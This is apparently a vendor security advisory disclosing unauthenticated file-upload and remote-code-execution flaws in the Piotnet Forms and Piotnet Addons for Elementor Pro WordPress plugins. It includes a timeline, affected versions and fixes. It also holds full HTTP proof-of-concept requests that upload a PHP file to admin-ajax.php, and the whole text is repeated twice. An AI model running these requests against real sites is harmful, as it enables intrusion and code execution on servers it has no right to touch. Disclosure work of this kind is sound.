<iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5HLVVHN" height="0" width="0" style="display:none;visibility:hidden">

High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins

High-severity-vulnerabilities-in-Piotnet-Forms-Free

Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:

  1. Piotnet Vulnerabilities: Summary and Timeline
  2. Piotnet Vulnerabilities Details
  3. Recommendations
  4. Recommended articles


Piotnet Vulnerabilities: Summary and Timeline

Piotnet vulnerabilities: Summary and Timeline

On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.

Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360. 

The Piotnet developers were provided with a detailed report on July 7, 2021, and followed up with PoC and recommendations on August 25, 2021. Since there were no updates from developers, the Wordpress.org plugins team was informed about a vulnerable free plugin version available on https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021, as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.

Finally, on October 13, 2021, Pitonet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).

 

Piotnet Vulnerabilities DetailsPiotnet Vulnerabilities Details

Description: Unauthenticated File Upload and RCE in Piotnet Forms

Affected Plugin: Piotnet Forms

Affected Versions: <= 1.0.22

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.0.23

 

Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro

Affected Plugin: Piotnet Forms Pro

Affected Versions: <=1.1.13  

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.1.14

 

For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:

piotnetforms_ajax_form_builder

 

Vulnerable file:

inc/forms/ajax-form-builder.php

 

The function is allowed for non-authenticated users:

The function is allowed for non-authenticated users ajax piotnet forms

Furthermore, there is no validation for parameters required by this function like post_id and form_id, and for an attack to be successful the parameters just should be transferred.

Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload different extension files and execute them further.

piotnet vulnerability codeFinally, although the file name is generated randomly, /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: vuln_domain.com

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=--------205816383

Content-Length: 645

Origin: http://vuln_domain.com

Connection: close

----------205816383

Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder

----------205816383

Content-Disposition: form-data; name="post_id"

11111

----------205816383

Content-Disposition: form-data; name="form_id"

d253bdb1

----------205816383

Content-Disposition: form-data; name="fields"

[]

----------205816383

Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2

----------205816383

Content-Disposition: form-data; name="file[]"; filename="file.php"

Content-Type: application/octet-stream

<?php

echo("PoC for vulnerability is confirmed");

?>

----------205816383--



Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro

Affected Plugin: Piotnet Addons for Elementor Pro

Affected Versions: <=6.4.11 

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 6.4.12

 

For Piotnet Addons For Elementor Pro, the case is quite similar, except the function name is pafe_ajax_form_builder and the uploads directory in /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: vuln_domain.com

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=--------205816383

Content-Length: 645

Origin: http://vuln_domain.com

Connection: close

----------205816383

Content-Disposition: form-data; name="action"

pafe_ajax_form_builder

----------205816383

Content-Disposition: form-data; name="post_id"

11111

----------205816383

Content-Disposition: form-data; name="form_id"

d253bdb1

----------205816383

Content-Disposition: form-data; name="fields"

[]

----------205816383

Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2

----------205816383

Content-Disposition: form-data; name="file[]"; filename="file.php"

Content-Type: application/octet-stream

<?php

echo("PoC for vulnerability is confirmed");

?>

----------205816383--

 

Recommendations

piotnet forms addons vulnerability recommendations

To protect your servers from vulnerabilities exploitation we strongly recommend:

  • Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.
  • Updating your Piotnet plugins to the latest versions.

Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.

Make your servers secure now!

Recommended Articles

High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins

High-severity-vulnerabilities-in-Piotnet-Forms-Free

Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:

  1. Piotnet Vulnerabilities: Summary and Timeline
  2. Piotnet Vulnerabilities Details
  3. Recommendations
  4. Recommended articles


Piotnet Vulnerabilities: Summary and Timeline

Piotnet vulnerabilities: Summary and Timeline

On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.

Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360. 

The Piotnet developers were provided with a detailed report on July 7, 2021, and followed up with PoC and recommendations on August 25, 2021. Since there were no updates from developers, the Wordpress.org plugins team was informed about a vulnerable free plugin version available on https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021, as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.

Finally, on October 13, 2021, Pitonet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).

 

Piotnet Vulnerabilities DetailsPiotnet Vulnerabilities Details

Description: Unauthenticated File Upload and RCE in Piotnet Forms

Affected Plugin: Piotnet Forms

Affected Versions: <= 1.0.22

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.0.23

 

Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro

Affected Plugin: Piotnet Forms Pro

Affected Versions: <=1.1.13  

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.1.14

 

For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:

piotnetforms_ajax_form_builder

 

Vulnerable file:

inc/forms/ajax-form-builder.php

 

The function is allowed for non-authenticated users:

The function is allowed for non-authenticated users ajax piotnet forms

Furthermore, there is no validation for parameters required by this function like post_id and form_id, and for an attack to be successful the parameters just should be transferred.

Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload different extension files and execute them further.

piotnet vulnerability codeFinally, although the file name is generated randomly, /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: vuln_domain.com

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=--------205816383

Content-Length: 645

Origin: http://vuln_domain.com

Connection: close

----------205816383

Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder

----------205816383

Content-Disposition: form-data; name="post_id"

11111

----------205816383

Content-Disposition: form-data; name="form_id"

d253bdb1

----------205816383

Content-Disposition: form-data; name="fields"

[]

----------205816383

Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2

----------205816383

Content-Disposition: form-data; name="file[]"; filename="file.php"

Content-Type: application/octet-stream

<?php

echo("PoC for vulnerability is confirmed");

?>

----------205816383--



Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro

Affected Plugin: Piotnet Addons for Elementor Pro

Affected Versions: <=6.4.11 

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 6.4.12

 

For Piotnet Addons For Elementor Pro, the case is quite similar, except the function name is pafe_ajax_form_builder and the uploads directory in /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: vuln_domain.com

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=--------205816383

Content-Length: 645

Origin: http://vuln_domain.com

Connection: close

----------205816383

Content-Disposition: form-data; name="action"

pafe_ajax_form_builder

----------205816383

Content-Disposition: form-data; name="post_id"

11111

----------205816383

Content-Disposition: form-data; name="form_id"

d253bdb1

----------205816383

Content-Disposition: form-data; name="fields"

[]

----------205816383

Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2

----------205816383

Content-Disposition: form-data; name="file[]"; filename="file.php"

Content-Type: application/octet-stream

<?php

echo("PoC for vulnerability is confirmed");

?>

----------205816383--

 

Recommendations

piotnet forms addons vulnerability recommendations

To protect your servers from vulnerabilities exploitation we strongly recommend:

  • Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.
  • Updating your Piotnet plugins to the latest versions.

Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.

Make your servers secure now!

Recommended Articles

Subscribe to Imunify security Newsletter